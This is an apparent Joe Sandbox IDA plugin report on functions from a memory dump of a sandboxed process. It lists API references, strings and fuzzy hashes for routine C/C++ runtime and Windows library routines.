Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Open
String ID: ?
API String ID: 71445658-1684325040
Opcode ID: 14381e56b26b600d238c14be30c65053399161a11b8c21598b4fb60d4d9878d1
Instruction ID: db984083251d85525a731cd2aabe880711dc0124c469f64d0cf58fdd452e5862
Opcode Fuzzy Hash: 14381e56b26b600d238c14be30c65053399161a11b8c21598b4fb60d4d9878d1
Instruction Fuzzy Hash: DF41A172A1CB8181EB508B25F89036AB7A0FB85794F105235FA9DC2B99DF3CD194CB41

Function 00007FF6218B4FB8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6218B4FDD
GetProcAddress.KERNEL32 ref: 00007FF6218B4FF3
FreeLibrary.KERNEL32 ref: 00007FF6218B501A

Strings

CorExitProcess, xrefs: 00007FF6218B4FEC
mscoree.dll, xrefs: 00007FF6218B4FD4

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 780b3f1f3aecbe1eb4b75bb10cd40d76e1f940e32b271abccdf7c11bca0f4dbd
Instruction ID: 9b655caad237190c73913ba52d08c1ed5a96c7f763fc88a13dd857928ee25a18
Opcode Fuzzy Hash: 780b3f1f3aecbe1eb4b75bb10cd40d76e1f940e32b271abccdf7c11bca0f4dbd
Instruction Fuzzy Hash: DEF06225A1DA0681EF148F24ECD433A63A0BF497A1F940639E56DC62E8DF3CD245C742

Function 00007FF621846490 Relevance: 7.8, APIs: 5, Instructions: 312COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621846922
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621846928
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184692E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621846934
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62184693A

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: da0d0d1abd4a8547f32ed92ba23823cd72b888d06a31482dbc3276105413b65c
Instruction ID: bc513150e666846ba46a60ca465e30173907576f5908ea9c4499a93fb6be0cfb
Opcode Fuzzy Hash: da0d0d1abd4a8547f32ed92ba23823cd72b888d06a31482dbc3276105413b65c
Instruction Fuzzy Hash: 39D1AF62F1CB8285EF108B65D8802BD6765AB457E8F205232EE5DD7ADADE7CE4808341

Function 00007FF6218C1314 Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FF6218C1437
__AdjustPointer.LIBCMT ref: 00007FF6218C1482

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 3df3621708c9e1d29be45954cd8076bff015c977087edb3d15e3ad851c434b44
Instruction ID: e7820d1d2554ead296cb36f54b77f9afb7305a1b2b7f880d9817e0b3bb3a6b1e
Opcode Fuzzy Hash: 3df3621708c9e1d29be45954cd8076bff015c977087edb3d15e3ad851c434b44
Instruction Fuzzy Hash: E8B19222A0E682C2EF69DB55D9C0678A391EF64B84F198635DE4DC7BC5DE3CE4428342

Function 00007FF6218B11C8 Relevance: 7.7, APIs: 5, Instructions: 196COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6218B1207
_set_statfp.LIBCMT ref: 00007FF6218B1225
_set_statfp.LIBCMT ref: 00007FF6218B124E
_set_statfp.LIBCMT ref: 00007FF6218B148A

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: dafef7e4c20223e5ca6141b6b5924ce650fb2efe4a4f2b5535d10e0333dca376
Instruction ID: cb511ce806765764f9d619c62e4c91ccd5135cc86bfaf1cf0c3f463b78a9da92
Opcode Fuzzy Hash: dafef7e4c20223e5ca6141b6b5924ce650fb2efe4a4f2b5535d10e0333dca376
Instruction Fuzzy Hash: BA811452D1CA4685FF328B35BCC037A6791FF45398F144331E95EEA9A5DF3CAA818602

Function 00007FF62189A260 Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00007FF62189A280
FreeEnvironmentStringsW.KERNEL32 ref: 00007FF62189A37B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189A3A5
RtlInitUnicodeString.NTDLL ref: 00007FF62189A3EE
RtlInitUnicodeString.NTDLL ref: 00007FF62189A3FB

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: EnvironmentInitStringStringsUnicode$Free_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1868271193-0
Opcode ID: de21a5369233536c8b43a9534c0df9e1de0c784894e8b33ee155e032722646cf
Instruction ID: ad590babe6628306f97ebcd6a5b9ff6d83489887d59c312b6fea35b9321d2dd9
Opcode Fuzzy Hash: de21a5369233536c8b43a9534c0df9e1de0c784894e8b33ee155e032722646cf
Instruction Fuzzy Hash: F9519A22A1CB81C2EB108F15E88036D77A1FB99B94F549221EB9D83B95DF7CE1E08305

Function 00007FF6218959A0 Relevance: 7.6, APIs: 5, Instructions: 106COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00007FF6218959D2
GetWindowRect.USER32 ref: 00007FF6218959E3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621895B5C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621895B62
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621895B68

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Window$DesktopRect
String ID:
API String ID: 1991322523-0
Opcode ID: d0e26eb9abbde6e5338c0e9f87c0225c778411bf106319fc7e99dee52fabdb16
Instruction ID: c0029b7d368069423adf8d70aab59e8d202152442efaed49548d8cb3c564318d
Opcode Fuzzy Hash: d0e26eb9abbde6e5338c0e9f87c0225c778411bf106319fc7e99dee52fabdb16
Instruction Fuzzy Hash: 66419662E1CB8545EF109B28E89537EA351EBC57E4F104331EAADC6BDADF2CD1808742

Function 00007FF6218AA12C Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6218A7EF7,?,?,00000000,00007FF6218A8192,?,?,?,?,-2723E8D8DEBC5093,00007FF6218A811E), ref: 00007FF6218AA14B
FlsSetValue.KERNEL32(?,?,?,00007FF6218A7EF7,?,?,00000000,00007FF6218A8192,?,?,?,?,-2723E8D8DEBC5093,00007FF6218A811E), ref: 00007FF6218AA16A
FlsSetValue.KERNEL32(?,?,?,00007FF6218A7EF7,?,?,00000000,00007FF6218A8192,?,?,?,?,-2723E8D8DEBC5093,00007FF6218A811E), ref: 00007FF6218AA192
FlsSetValue.KERNEL32(?,?,?,00007FF6218A7EF7,?,?,00000000,00007FF6218A8192,?,?,?,?,-2723E8D8DEBC5093,00007FF6218A811E), ref: 00007FF6218AA1A3
FlsSetValue.KERNEL32(?,?,?,00007FF6218A7EF7,?,?,00000000,00007FF6218A8192,?,?,?,?,-2723E8D8DEBC5093,00007FF6218A811E), ref: 00007FF6218AA1B4

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: ca226fc8aa6ea3e1674c47910d43e2a08806468f10572f36c53bf7ea8cfe320a
Instruction ID: d155325dbb4fef61388996de74ceeca95ad4432b312c5d8ac4c01b16fd99207e
Opcode Fuzzy Hash: ca226fc8aa6ea3e1674c47910d43e2a08806468f10572f36c53bf7ea8cfe320a
Instruction Fuzzy Hash: 9A113720F0DA4253FF5897216ED11BA62865F443F0E485734E93EC6ADAEE3DF4018203

Function 00007FF6218A9FC0 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6218A9FD1
FlsSetValue.KERNEL32 ref: 00007FF6218A9FF0
FlsSetValue.KERNEL32 ref: 00007FF6218AA018
FlsSetValue.KERNEL32 ref: 00007FF6218AA029
FlsSetValue.KERNEL32 ref: 00007FF6218AA03A

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 029adb41c12981c097db0845c1b503877c108bf882051739f380996e4e9e8d04
Instruction ID: 37184d6e8c4b78aca5e5b10ea28f420b488d2fd604fdb88562e1a0d7583b106b
Opcode Fuzzy Hash: 029adb41c12981c097db0845c1b503877c108bf882051739f380996e4e9e8d04
Instruction Fuzzy Hash: 6C11B710E4D20783FF69A6355CE15BA21865F45774F186734EA3ECA6D6ED3EB4418203

Function 00007FF62185F2C0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 292COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185F4C6
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62185F4D2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185F6D1

Strings

Nk, xrefs: 00007FF62185F5AD

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID: Nk
API String ID: 3936042273-1353404103
Opcode ID: f35a34bca3f0dc2c7d8ac32fa3698dc1aec30600c3bc7ed9a2ee49a907a52dcf
Instruction ID: 6503d5e15a5d9b8aa6123d692d078cb5a23244b31ea336a27f1a5e154cd3cd47
Opcode Fuzzy Hash: f35a34bca3f0dc2c7d8ac32fa3698dc1aec30600c3bc7ed9a2ee49a907a52dcf
Instruction Fuzzy Hash: E4C18E33A18B859AEB10CF75E8802AD73B5F759798F145625EF8D93B59DF38E1A08300

Function 00007FF621870BD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 248COMMON

Download Yara Rule

Strings

ios_base::badbit set, xrefs: 00007FF621870C37
ios_base::eofbit set, xrefs: 00007FF621870C49
ios_base::failbit set, xrefs: 00007FF621870C42

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID:
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 0-1866435925
Opcode ID: badb5bdb2e19113d5e26389ef2e3cc5cdc8ea783549e4f7031b2393c0ee3220f
Instruction ID: 767bb8a69d02cc6aebde196b91f894d10fc7868aea244eabe64979af2dd8f19e
Opcode Fuzzy Hash: badb5bdb2e19113d5e26389ef2e3cc5cdc8ea783549e4f7031b2393c0ee3220f
Instruction Fuzzy Hash: 0E917762B08B8582EB548B01E89436DB7A5FB49BC4F554032EA9DCBB94CF7CD882C341

Function 00007FF6218CF0DC Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218CF3BB

Part of subcall function 00007FF6218BC4AC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6218BC4C9

Strings

ccs, xrefs: 00007FF6218CF2F6
UTF-8, xrefs: 00007FF6218CF33A
UTF-16LEUNICODE, xrefs: 00007FF6218CF359

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: a61b9dafeebeef71c778538e02d1dd93d241f4be75a88b4b5df5efb2b9ec5def
Instruction ID: e3f23976fb156767f76bf48409ef2c20bca58ef5dd13471475135ee1ec32fe3b
Opcode Fuzzy Hash: a61b9dafeebeef71c778538e02d1dd93d241f4be75a88b4b5df5efb2b9ec5def
Instruction Fuzzy Hash: 6781B076E0C60385FFAD8F25C9D027837A2AB51B48F958236DA0AD72C5DF2DE9019303

Function 00007FF62183EBF0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207COMMON

Download Yara Rule

Strings

[json.exception., xrefs: 00007FF62183ED2B

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID:
String ID: [json.exception.
API String ID: 0-791563284
Opcode ID: 6db8df1c8411d8b9e849b76a511a04d955e5f16b7b25b08351f4c7d29b643ccf
Instruction ID: b782f99001dda3d35ffd2f633220db9e307ba03fcc0bbf5f570f233d76044bda
Opcode Fuzzy Hash: 6db8df1c8411d8b9e849b76a511a04d955e5f16b7b25b08351f4c7d29b643ccf
Instruction Fuzzy Hash: 5771E363F18B8185FB00CF79D8802AD27A1EB95B98F244235DE5D97B9ADF7CD0828341

Function 00007FF6218C2688 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6218C26F8
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6218C2743

Strings

MOC, xrefs: 00007FF6218C270C
RCC, xrefs: 00007FF6218C2714

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 9c00d47a1c5516f7bd2be0d164cd20731702100fa42f3d3dd2f3d47e27ffce20
Instruction ID: 8e6b9a6f69f614c769aa0815393fc79c261304ce52b4b13ae6b55a8df938a115
Opcode Fuzzy Hash: 9c00d47a1c5516f7bd2be0d164cd20731702100fa42f3d3dd2f3d47e27ffce20
Instruction Fuzzy Hash: 1791B473A08B818AEB14DB65DC802AD77A1F744788F14423AEE4D97795DF3CD195C702

Function 00007FF6218C2418 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6218C2477
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6218C24C3

Strings

MOC, xrefs: 00007FF6218C248B
RCC, xrefs: 00007FF6218C2493

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: a60986bc9adbf2c75a94aae45f25198f4bb40c34f31260bb5ef7955aadcba44f
Instruction ID: 2cefd6923ce32669dfdf645991ec089b20ec0ed03c3965a3feeba7dbeb6de60a
Opcode Fuzzy Hash: a60986bc9adbf2c75a94aae45f25198f4bb40c34f31260bb5ef7955aadcba44f
Instruction Fuzzy Hash: BE61933290CBC586DB649B15E8807AAB7A0FB94B94F044325EB9D83BD5DF7CD190CB02

Function 00007FF6218C2C08 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6218C2C30
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6218C2D18

Strings

csm, xrefs: 00007FF6218C2D6A
csm, xrefs: 00007FF6218C2C52

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1075979170a2e9a18e477d88d2de6d235b634f407b84dd7ceece1c898f0d7b57
Instruction ID: 61ea250c811baead8a73fd902f3e7419d5a32532778e24dacc7399aced4ca6b7
Opcode Fuzzy Hash: 1075979170a2e9a18e477d88d2de6d235b634f407b84dd7ceece1c898f0d7b57
Instruction Fuzzy Hash: 7E514C3290C7468AEF688F15988436876A1EB55F94F184236DA8DD7BD6CF3CE461CB03

Function 00007FF62183CA60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF62183CACF
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF62183CB17
_Getctype.LIBCPMT ref: 00007FF62183CB55

Strings

bad locale name, xrefs: 00007FF62183CC0E

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
